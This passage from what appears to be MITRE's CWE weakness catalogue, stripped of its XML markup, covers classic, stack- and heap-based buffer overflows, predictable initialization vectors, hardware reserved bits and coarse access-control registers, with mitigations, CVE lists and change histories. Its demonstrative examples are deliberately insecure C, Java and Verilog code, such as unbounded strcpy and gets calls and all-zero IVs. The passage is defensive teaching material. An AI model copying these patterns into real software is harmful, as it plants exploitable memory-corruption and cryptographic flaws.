an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Build and Compilation - Operation - Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution. - - - Implementation - Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. - Moderate - This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). - - - Architecture and Design - Enforcement by Conversion - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - - - The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array. - - char last_name[20];printf ("Enter your last name: ");scanf ("%s", last_name); - - The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total. - - - The following code attempts to create a local copy of a buffer to perform some manipulations to the data. - - void manipulate_string(char * string){char buf[24];strcpy(buf, string);...} - - However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter. - - - The code below calls the gets() function to read in data from the command line. - - - char buf[24];printf("Please enter your name and press <Enter>\n");gets(buf);...} - - However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition. - - - In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file. - - ... - struct hostent *clienthp;char hostname[MAX_LEN]; - // create server socket, bind to server address and listen on socket... - // accept client connections and process requestsint count = 0;for (count = 0; count < MAX_CONNECTIONS; count++) { - - int clientlen = sizeof(struct sockaddr_in);int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen); - if (clientsocket >= 0) { - clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);strcpy(hostname, clienthp->h_name);logOutput("Accepted client connection from host ", hostname); - // process client request...close(clientsocket); - } - }close(serversocket); - - ... - - However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method. - - - - - CVE-2000-1094 - buffer overflow using command with long argument - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1094 - - - CVE-1999-0046 - buffer overflow in local program using long environment variable - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0046 - - - CVE-2002-1337 - buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337 - - - CVE-2003-0595 - By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0595 - - - CVE-2001-0191 - By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191 - - - - Memory Management - - - Memory - - - - Unbounded Transfer ('classic overflow') - - - Buffer Overflow - - - Buffer overflow - - - A1 - Unvalidated Input - CWE More Specific - - - A5 - Buffer Overflows - CWE More Specific - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - Exact - - - 7 - Buffer Overflow - - - SFP8 - Faulty Buffer Access - - - ASCSM-CWE-120 - - - ASCRM-CWE-120 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them. - Many issues that are now called "buffer overflows" are substantively different than the "classic" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-10 - Changed name and description to more clearly emphasize the "classic" nature of the overflow. - - - CWE Content Team - MITRE - 2008-10-14 - updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Other_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Alternate_Terms, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Potential_Mitigations - - Unbounded Transfer ('Classic Buffer Overflow') - - - - The product uses a cryptographic primitive that uses an Initialization - Vector (IV), but the product does not generate IVs that are - sufficiently unpredictable or unique according to the expected - cryptographic requirements for that primitive. - - - By design, some cryptographic primitives - (such as block ciphers) require that IVs - must have certain properties for the - uniqueness and/or unpredictability of an - IV. Primitives may vary in how important - these properties are. If these properties - are not maintained, e.g. by a bug in the - code, then the cryptography may be weakened - or broken by attacking the IVs themselves. - - - - - - - - - - Implementation - - - Architecture and Design - - - - - Confidentiality - Read Application Data - If the IV is not properly initialized, data that is encrypted can be compromised and information about the data can be leaked. See [REF-1179]. - - - - - Implementation - Different cipher - modes have different requirements for - their IVs. When choosing and implementing - a mode, it is important to understand - those requirements in order to keep - security guarantees intact. Generally, it - is safest to generate a random IV, since - it will be both unpredictable and have a - very low chance of being non-unique. IVs - do not have to be kept secret, so if - generating duplicate IVs is a concern, a - list of already-used IVs can be kept and - checked against. - - - NIST offers recommendations on generation of IVs for modes of which they have approved. These include options for when random IVs are not practical. For CBC, CFB, and OFB, see [REF-1175]; for GCM, see [REF-1178]. - - - - - - - In the following examples, CBC mode is used when encrypting data: - - EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv); - - - public class SymmetricCipherTest { - public static void main() { - - byte[] text ="Secret".getBytes();byte[] iv ={0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};KeyGenerator kg = KeyGenerator.getInstance("DES");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes); - } - } - - In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack. - - - - The Wired Equivalent Privacy (WEP) protocol used in the 802.11 - wireless standard only supported 40-bit keys, and the IVs were only 24 - bits, increasing the chances that the same IV would be reused for - multiple messages. The IV was included in plaintext as part of the packet, making - it directly observable to attackers. Only 5000 messages are needed - before a collision occurs due to the "birthday paradox" [REF-1176]. Some - implementations would reuse the same IV for each packet. This IV reuse - made it much easier for attackers to recover plaintext from - two packets with the same IV, using well-understood attacks, - especially if the plaintext was known for one of the packets [REF-1175]. - - - - - - CVE-2020-1472 - ZeroLogon vulnerability - use of a static IV of all zeroes in AES-CFB8 mode - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472 - - - CVE-2011-3389 - BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389 - - - CVE-2001-0161 - wireless router does not use 6 of the 24 bits for WEP encryption, making it easier for attackers to decrypt traffic - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0161 - - - CVE-2001-0160 - WEP card generates predictable IV values, making it easier for attackers to decrypt traffic - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0160 - - - CVE-2017-3225 - device bootloader uses a zero initialization vector during AES-CBC - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3225 - - - CVE-2016-6485 - crypto framework uses PHP rand function - which is not cryptographically secure - for an initialization vector - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6485 - - - CVE-2014-5386 - encryption routine does not seed the random number generator, causing the same initialization vector to be generated repeatedly - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5386 - - - CVE-2020-5408 - encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408 - - - CVE-2017-17704 - messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704 - - - CVE-2017-11133 - application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133 - - - CVE-2007-3528 - Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528 - - - - Cryptography - - - - - - - - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - CWE Content Team - MITRE - 2021-03-09 - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes, Observed_Examples, References - - - - - The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design. However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state. - - Reserved bits are labeled as such so they can be allocated for a later purpose. They are not to do anything in the current design. However, designers might want to use these bits to debug or control/configure a future capability to help minimize time to market (TTM). If the logic being controlled by these bits is still enabled in production, an adversary could use the logic to induce unwanted/unsupported behavior in the hardware. - - - - - - - - - - - - - Architecture and Design - The Designer and Implementer have to make a conscious choice to do this - - - Implementation - The Designer and Implementer have to make a conscious choice to do this - - - Documentation - If documentation labels anything "for future use", "reserved", or the like, such labeling could indicate to an attacker a potential attack point - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Varies by Context - This type of weakness all depends on the capabilities of the logic being controlled or configured by the reserved bits - - - - - Architecture and Design - Implementation - - Include a feature to disable reserved bits. - - - - Integration - - Any writes to these reserve bits are blocked (e.g., ignored, access-protected, etc.), or an exception can be asserted. - - - - - - An adversary may perform writes to reserve space in hopes to change the behavior of the hardware. - - // Assume an IP has address space 0x0-0x0F for its configuration registers, with the last one labeled reserved (i.e. 0x0F). Therefore inside the Finite State Machine (FSM), the code is as follows: - - reg gpio_out = 0; //gpio should remain low for normal operation - - case (register_address) - 4'b1111 : //0x0F - begin - gpio_out = 1; - end - - In the code above, the GPIO pin should remain low for normal operation. However, it can be asserted by accessing the reserved address space (0x0F). This may be a concern if the GPIO state is being used as an indicator of health (e.g. if asserted the hardware may respond by shutting down or resetting the system which may not be the correct action the system should perform). - - reg gpio_out = 0; //gpio should remain low for normal operation - case (register_address) - //4'b1111 : //0x0F - default: gpio_out = gpio_out; - - - - - - - - - Brent Sherman - Intel Corporation - 2020-02-06 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function). - - - - - - - Primary - - - - - - - - There are generally several security-critical data on an execution stack that can lead to arbitrary code execution. The most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing. The attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program. Alternately, the attacker can supply the address of an important call, for instance the POSIX system() call, leaving arguments to the call on the stack. This is often called a return into libc exploit, since the attacker generally forces the program to jump at return time into an interesting routine in the C standard library (libc). Other important data commonly on the stack include the stack pointer and frame pointer, two values that indicate offsets for computing memory addresses. Modifying those values can often be leveraged into a "write-what-where" condition. - - - - Stack Overflow - "Stack Overflow" is often used to mean the same thing as stack-based buffer overflow, however it is also used on occasion to mean stack exhaustion, usually a result from an excessively recursive function call. Due to the ambiguity of the term, use of stack overflow to describe either circumstance is discouraged. - - - - - Architecture and Design - - - Implementation - - - High - - - Availability - Modify Memory - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - Integrity - Confidentiality - Availability - Access Control - Modify Memory - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. - - - Integrity - Confidentiality - Availability - Access Control - Other - Modify Memory - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Other - When the consequence is arbitrary code execution, this can often be used to subvert any other security service. - - - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Architecture and Design - Use an abstraction library to abstract away risky APIs. Not a complete solution. - - - Build and Compilation - Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. - - - Implementation - Implement and perform bounds checking on input. - - - Implementation - Do not use dangerous functions such as gets. Use safer, equivalent functions which check for boundary errors. - - - Operation - Use OS-level preventative functionality, such as ASLR. This is not a complete solution. - - - - - While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, stack-based buffer overflows: - - #define BUFSIZE 256int main(int argc, char **argv) {char buf[BUFSIZE];strcpy(buf, argv[1]);} - - The buffer size is fixed, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow. - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. - Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). - - - - - Stack overflow - - - SFP8 - Faulty Buffer Access - - - ARR38-C - Guarantee that library functions do not form invalid pointers - Imprecise - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - CWE More Specific - - - - - - - - - - - - Stack-based buffer overflows can instantiate in return address overwrites, stack pointer overwrites or frame pointer overwrites. They can also be considered function pointer overwrites, array indexer overwrites or write-what-where condition, etc. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Relationships - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations, White_Box_Definitions - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Background_Details, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - - - - A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). - - - - - - - Primary - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - Integrity - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Modify Memory - Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime. - - - Integrity - Confidentiality - Availability - Access Control - Other - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Other - When the consequence is arbitrary code execution, this can often be used to subvert any other security service. - - - - - Pre-design: Use a language or compiler that performs automatic bounds checking. - - - Architecture and Design - Use an abstraction library to abstract away risky APIs. Not a complete solution. - - - Build and Compilation - Pre-design through Build: Canary style bounds checking, library changes which ensure the validity of chunk data, and other such fixes are possible, but should not be relied upon. - - - Implementation - Implement and perform bounds checking on input. - - - Implementation - Libraries or Frameworks - Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary. - - - Operation - Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth. - - - - - While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, heap-based buffer overflows: - - #define BUFSIZE 256int main(int argc, char **argv) {char *buf;buf = (char *)malloc(sizeof(char)*BUFSIZE);strcpy(buf, argv[1]);} - - The buffer is allocated heap memory with a fixed size, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow. - - - This example applies an encoding procedure to an input string and stores it into a buffer. - - char * copy_input(char *user_supplied_string){ - int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ - if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ - - - /* encode to &lt; */ - - - }else dst_buf[dst_index++] = user_supplied_string[i]; - }return dst_buf; - } - - The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. - - - - - CVE-2007-4268 - Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268 - - - CVE-2009-2523 - Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523 - - - CVE-2021-29529 - Chain: machine-learning product can have a heap-based - buffer overflow (CWE-122) when some integer-oriented bounds are - calculated by using ceiling() and floor() on floating point values - (CWE-1339) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529 - - - - Memory - - - - Heap overflow - - - SFP8 - Faulty Buffer Access - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - CWE More Specific - - - - - - - - - - - - - - Heap-based buffer overflows are usually just as dangerous as stack-based buffer overflows. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Common_Consequences, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Likelihood_of_Exploit, Observed_Examples, References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets. - - Integrated circuits and hardware engines can expose accesses to assets (device configuration, keys, etc.) to trusted firmware or a software module (commonly set by BIOS/bootloader). This access is typically access-controlled. Upon a power reset, the hardware or system usually starts with default values in registers, and the trusted firmware (Boot firmware) configures the necessary access-control protection. - A common weakness that can exist in such protection schemes is that access controls or policies are not granular enough. This condition allows agents beyond trusted agents to access assets and could lead to a loss of functionality or the ability to set up the device securely. This further results in security risks from leaked, sensitive, key material to modification of device configuration. - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during hardware implementation and identified later during Testing or System Configuration phases. - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Other - High - - - - - Architecture and Design - Implementation - Testing - - - Access-control-policy protections must be reviewed for design inconsistency and common weaknesses. - Access-control-policy definition and programming flow must be tested in pre-silicon, post-silicon testing. - - - High - - - - - - Consider a system with a register for storing AES key for encryption or decryption. The key is 128 bits, implemented as a set of four 32-bit registers. The key registers are assets and registers, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary access controls. - The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each register is a 32-bit register, and it can support access control for a maximum of 32 agents. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit and, if "0" (i.e., Clear), disallows the respective action to that corresponding agent. - - - - - Register - Field description - - - AES_ENC_DEC_KEY_0 - AES key [0:31] for encryption or decryptionDefault 0x00000000 - - - AES_ENC_DEC_KEY_1 - AES key [32:63] for encryption or decryptionDefault 0x00000000 - - - AES_ENC_DEC_KEY_2 - AES key [64:95] for encryption or decryptionDefault 0x00000000 - - - AES_ENC_DEC_KEY_4 - AES key [96:127] for encryption or decryptionDefault 0x00000000 - - - AES_KEY_READ_WRITE_POLICY - [31:0] Default 0x00000006 - meaning agent with identities "1" and "2" can both read from and write to key registers - - - - In the above example, there is only one policy register that controls access to both read and write accesses to the AES-key registers, and thus the design is not granular enough to separate read and writes access for different agents. Here, agent with identities "1" and "2" can both read and write. - A good design should be granular enough to provide separate access controls to separate actions. Access control for reads should be separate from writes. Below is an example of such implementation where two policy registers are defined for each of these actions. The policy is defined such that: the AES-key registers can only be read or used by a crypto agent with identity "1" when bit #1 is set. The AES-key registers can only be programmed by a trusted firmware with identity "2" when bit #2 is set. - - - - AES_KEY_READ_POLICY - [31:0] Default 0x00000002 - meaning only Crypto engine with identity "1" can read registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 - - - AES_KEY_WRITE_POLICY - [31:0] Default 0x00000004 - meaning only trusted firmware with identity "2" can program registers: 